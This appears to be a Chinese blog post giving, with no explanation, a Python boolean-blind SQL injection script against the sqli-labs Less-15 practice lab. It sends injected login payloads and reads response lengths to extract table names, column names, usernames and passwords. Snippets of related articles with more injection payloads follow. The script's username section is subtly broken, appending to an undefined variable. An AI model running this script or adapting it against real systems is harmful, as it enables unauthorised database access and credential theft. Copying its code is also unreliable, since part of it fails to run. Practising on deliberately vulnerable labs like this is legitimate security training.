Bool盲注脚本

最新推荐文章于 2025-03-12 21:36:14 发布
原创 最新推荐文章于 2025-03-12 21:36:14 发布 · 755 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #web安全 #安全 

import requests

chars = "qwertyuiopasdfghjklzxcvbnm0123456789}{"
url = "http://localhost/sqli-labs-kali2-master/Less-15/"

for x in range(0, 10):
    table_name = ""
    for y in range(1, 20):
        for char in chars:
            payload = {
                "uname": "-1' or mid((select table_name from information_schema.tables where table_schema=database() limit "+str(x)+",1),"+str(y)+",1)='"+char+"'#",
                "passwd": "",
                "submit": "Submit"
            }
            r = requests.post(url=url, data=payload)
            # print(len(r.text))
            if len(r.text) == 1492:
                table_name += char
    if bool(table_name):
        print(table_name)

# 获取字段名
for x in range(0, 10):
    column_name = ""
    for y in range(1, 20):
        for char in chars:
            payload = {
                "uname": "-1' or mid((select column_name from information_schema.columns where table_name='users' limit "+str(x)+",1),"+str(y)+",1)='"+char+"'#",
                "passwd": "",
                "submit": "Submit"
            }
            r = requests.post(url=url, data=payload)
            # print(len(r.text))
            if len(r.text) == 1492:
                column_name += char
    if bool(column_name):
        print(column_name)

# 获取用户名
for x in range(0, 10):
    password_value = ""
    for y in range(1, 50):
        for char in chars:
            payload = {
                "uname": "-1' or mid((select username from users limit "+str(x)+",1),"+str(y)+",1)='"+char+"'#",
                "passwd": "",
                "submit": "Submit"
            }
            r = requests.post(url=url, data=payload)
            # print(len(r.text))
            if len(r.text) == 1492:
                username_value += char
    if bool(username_value):
        print(username_value)
# 获取密码
for x in range(0, 10):
    password_value = ""
    for y in range(1, 50):
        for char in chars:
            payload = {
                "uname": "-1' or mid((select password from users limit "+str(x)+",1),"+str(y)+",1)='"+char+"'#",
                "passwd": "",
                "submit": "Submit"
            }
            r = requests.post(url=url, data=payload)
            # print(len(r.text))
            if len(r.text) == 1492:
                password_value += char
    if bool(password_value):
        print(password_value)
Python-Boolean注脚本(附带释,总脚本在结尾)
sGanYu
02-27 1434
靶场:CTFHub 设置重新连接,默认的情况下keep-alive为True # -*- coding: UTF-8 -*- import requests import optparse # 实现为脚本传递命令参数 import time DBName = "" # 数据库名的变量 DBTables = [] DBColumns = [] DBData = {} flag = "query_success" # 判断Ture回显的特定内容 r1 = int(input('设置重连次数
sql入之bool
banliyaoguai的博客
05-12 791
二分法的思想很简单,因为整个数组是有序的,数组默认是递增的。首先选择数组中间的数字和需要查找的目标值比较如果相等最好,就可以直接返回答案了如果不相等如果中间的数字大于目标值,则中间数字向右的所有数字都大于目标值,全部排除如果中间的数字小于目标值,则中间数字向左的所有数字都小于目标值,全部排除。
写一个布尔脚本
weixin_35752645的博客
01-01 616
布尔是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
【Python】测试布尔注脚
weixin_30457881的博客
11-16 401
sqli-labs第八关:单引号布尔,手工测出database长度,个人觉得手工比较快 然后使用脚本测database内容,这个脚本就比手工快多了,脚本内容如下: 1 import sys 2 import requests 3 4 url="http://127.0.0.1/sqli-labs-master/Less-8/?id=1%s" 5 payload="...
SQL-LABS GET型布尔注脚本(node)
AaronLuo
09-03 416
原理 基于SQL-LABS LESS-5,LESS-8 GET型布尔入,(布尔详解),,基于MSQL 布尔,主要是判断ascii码值是否与猜测的值相同,通过判断页面变化,确定ascii值 由于0-z的ascii值是48-122,256 = 2 ^ 0 + 2 ^ 1 + 2 ^ 2 + 2 ^ 3 + 2 ^ 4 +2 ^ 5 + 2 ^ 6 + 2^ 7 ,通过按位与运算8次,结果相加...
python布尔脚本
kiihuang的博客
03-28 619
使用python,编写一个可以自动爆破的布尔注脚本,根据不同情况调整里面的Content-Length的值。
综合bool注脚本.py
07-15
可以适用于部分SQL入题目
布尔注脚本+时间
weixin_73904941的博客
10-19 1494
布尔 + 时间 python自动脚本
DVWA-SQL注脚本(全)
10-04
DVWA SQL,Low,Medium,High 三个级别的bool注脚本,比较完整,配套解释 : https://blog.youkuaiyun.com/csdn_Pade/article/details/82886765
Python 安全开发 布尔注脚
YouthBelief的博客
12-03 1383
python开发-批量fofa+poc验证0x00 思路0x01 脚本编写1.fofa爬取步骤一:请求搜索地址 以 GlassFish 任意文件读取 为例 0x00 思路 要想批量验证漏洞是否存在需要考虑的点: 1.获取可能存在漏洞的地址信息。 1.1可借助fofa获取目标 影响版本是 <= 4.1.1 fofa指纹 "GlassFish" && port="4848" && country="CN" 或者 "GlassFish" && port
布尔python脚本.zip
12-28
GET和POST型python脚本
布尔(ctfhub)
2401_82985722的博客
03-27 2824
页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行SQL入。在入语句后,不是返回查询到的结果,而只是返回查询是否成功。?id=1' and 1=1--+ 真页面true?id=1' and 1=2--+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数一、手动入一般顺序:爆数据库名长度。
布尔爆破脚本
最新发布
2401_88743143的博客
03-12 144
【代码】布尔爆破脚本
时间布尔注脚
星星的博客
07-01 500
sql
Python自动化sql入:布尔
qq_46145027的博客
04-22 6174
在sql入时,使用python脚本可以大大提高入效率,这里演示一下编写python脚本实现布尔的基本流程:演示靶场:sqli-labs。
注脚本2.基于bool
weixin_30530523的博客
03-10 148
注脚本2.基于bool 1 #!/usr/bin/env python 2 #encoding:utf-8 3 #by i3ekr 4 #using 5 # python sqlinject.py -D "数据库名" -T "表明" -C "列明" --dump "列明" 6 # 7 import requests,re,os 8 web =...
基于python的布尔爆破脚本(sqli-libs第八关)
henghengzhao_的博客
10-06 2301
写这个脚本的原因是因为布尔爆破步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
sqli-labs_less8布尔注脚
qq_62989306的博客
01-28 4932
import requests import string url='http://127.0.0.1/sqli/Less-8/' i=0 db_name_len=0 print('[+]正在猜解数据库长度......') while True: payload=url+"?id=1'and length(database())=%d--+"%i res=requests.get(payload) #print(payload) if 'You are in.......
python脚本实现布尔
04-28 1283
相信师傅们在平常渗透测试中,偶尔会遇到布尔的情况,但是手工的话太慢,上sqlmap流量又太大,特征太明显。所以用python脚本就是最优解,可以自定义user-agent等字段,入速度等。
DVWA SQL注脚本全解:三个级别bool技巧
1. Bool技术:Bool是指攻击者通过布尔逻辑(例如AND、OR)条件语句构造查询,通过应用程序返回的布尔值(真或假)来逐步判断数据库中的数据。Bool的成功实施需要攻击者能够区分不同查询条件对程序行为的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值